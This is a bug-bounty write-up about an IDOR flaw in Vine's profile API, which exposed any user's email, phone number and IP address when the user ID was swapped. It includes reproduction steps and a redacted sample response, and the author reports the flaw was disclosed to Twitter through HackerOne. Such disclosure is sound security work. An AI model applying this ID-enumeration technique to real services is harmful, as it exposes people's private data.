Vine User’s Private information disclosure

Prial Islam Khan
Nov 7, 2018 · 3 min read

Hello readers,

This is Prial Islam a security researcher from Bangladesh . This is a old finding of mine adding into my blog .

Today I will write about a Critical IDOR vulnerability that will lead to Information Disclosure what allowed me to get any Vine user’s sensitive information including Ip address/phone no/email .

I reported this bug to Twitter Security team in their Bug Bounty Program in Hackerone and they Rewarded me with a amount of 7560$ for this report .

$$$$ + Blog post permission 😾 😇

Vine has issued a statement regarding this vulnerability on their Vine blog Post here and also Hackerone mentioned this vulnerability in hackerone Zerodaily Newslatter .

  • Vulnerable Endpoint :- https://vine.co/api/users/profiles/<User Id>

When I was testing vine domains for something interesting . I noticed the Endpoint what response was giving my account all information . I thought this is normal as many site have this type of endpoint what shows logined users information . So again I thought let’s try to exploit this with CORS if it is miss-configured . But CORS Policy was in place . Then I changed the user-id value to a random number and I got shocked that someone else user information was in front of me . By changing the user-id value I was able to get any vine user all information .

Reproduce :

  • Choose any user to get his all information and collect his User-ID
  • Now place the User-ID in below endpoint and visit it . You will get Response in body .

https://vine.co/api/users/profiles/<User Id>

Response :

{“code”: “”, “data”: {“followerCount”: 16271364, “includePromoted”: 1, “captchaSucceeded”: 0, “recordComment”: null, “locale”: “iUS”, “shareUrl”: “https://vine.co/████████”, “hiddenPhoneNumber”: 0, “notPorn”: 0, “userId”: █████████, “private”: 0, “likeCount”: null, “commentCount”: null, “platforms”: [“android”, “ios”], “postCount”: null, “profileBackground”: “0x33ccbf”, “suspended”: null, “hiddenFacebook”: 0, “verifiedEmail”: 0, “explicitContent”: 0, “dmcaStrikeCount”: 0, “flaggedCount”: 7579, “verified”: 1, “loopCount”: 6132344784, “avatarUrl”: “http://v.cdn.vine.co/r/avatars/████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr”, “authoredPostCount”: 598, “review_result_illegal_review”: 0, “review_result_ok”: 0, “review”: null, “suspendedBy”: null, “twitterId”: ████████, “phoneNumber”: “██████████”, “location”: “Los Angeles California”, “notifyActivity”: 1, “facebookConnected”: 1, “explicitContentAdmin”: 0, “statsTags”: null, “hiddenEmail”: 0, “unflaggable”: 0, “username”: “████████”, “modified”: “2017–01–29T01:24:00.000000”, “userIdStr”: “████████”, “twitterIdStr”: “████████”, “vanityUrls”: [“kingbach”], “remixDisabled”: 0, “deleted”: null, “categories”: null, “released”: 0, “loopVelocity”: null, “strikeCounts”: [{“count”: 0, “strikeType”: “SEVERE_POLICY_VIOLATION”}, {“count”: 0, “strikeType”: “DMCA”}, {“count”: 0, “strikeType”: “SENSITIVE”}, {“count”: 0, “strikeType”: “POSSIBLY_ILLEGAL”}, {“count”: 0, “strikeType”: “GRAPHIC_NON_VIOLATING”}, {“count”: 0, “strikeType”: “ESC”}], “uploadHD”: 1, “verifiedPhoneNumber”: 1, “hiddenTwitter”: 0, “vineVerified”: 1, “notifyMessages”: 1, “needsPhoneVerification”: 0, “repostCount”: null, “twitterScreenname”: “██████”, “secondaryColor”: “0x33ccbf”, “twitterVerified”: 1, “captchaRequired”: 0, “edition”: null, “acceptsOutOfNetworkConversations”: 1, “disableAddressBook”: 1, “description”: “Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library”, “escStrikeCount”: 0, “review_result_explicit”: 0, “notificationsLastViewed”: “2016–04–26T21:03:35.000000”, “email”: “████████”, “hideFromPopular”: 0, “admin”: 0, “contentReview”: 0, “created”: “2013–04–13T19:30:31.000000”, “review_result_illegal_confirmed”: 0, “followingCount”: null, “lastLogin”: “2016–12–13T23:29:40.000000”, “escUser”: 0, “ipAddress”: “██████”, “twitterConnected”: 1}, “success”: true, “error”: “”}

Take a closer look in response and you will get a lot of private info about the user [ all information was removed by twitter security as those belongs to other users ]. Some of them are :

“platforms”: [“android”, “ios”]
“flaggedCount”: 7579
“twitterId”: “█████████”
“phoneNumber”: “█████”
“location”: “Los Angeles California”
“modified”: “2017–01–29T01:24:00.000000”
“notificationsLastViewed”: “2016–04–26T21:03:35.000000”
“email”: “█████████”
“created”: “2013–04–13T19:30:31.000000”
“lastLogin”: “2016–12–13T23:29:40.000000”
“ipAddress”: “█████”

Here Even ipAddress/email/phone no are being disclosed . So attacker can use these info and do malicious attacks on any vine user . And Attacker can dump all user information .

This will also effect twitter users as vine users can use their twitter account access to login vine services . I have got the same vulnerability on another bug bounty program Edmodo’s website .

Thanks for reading . Happy Hunting .

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Prial Islam Khan

Written by

A teenager boy with passion of Breaking Security .

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade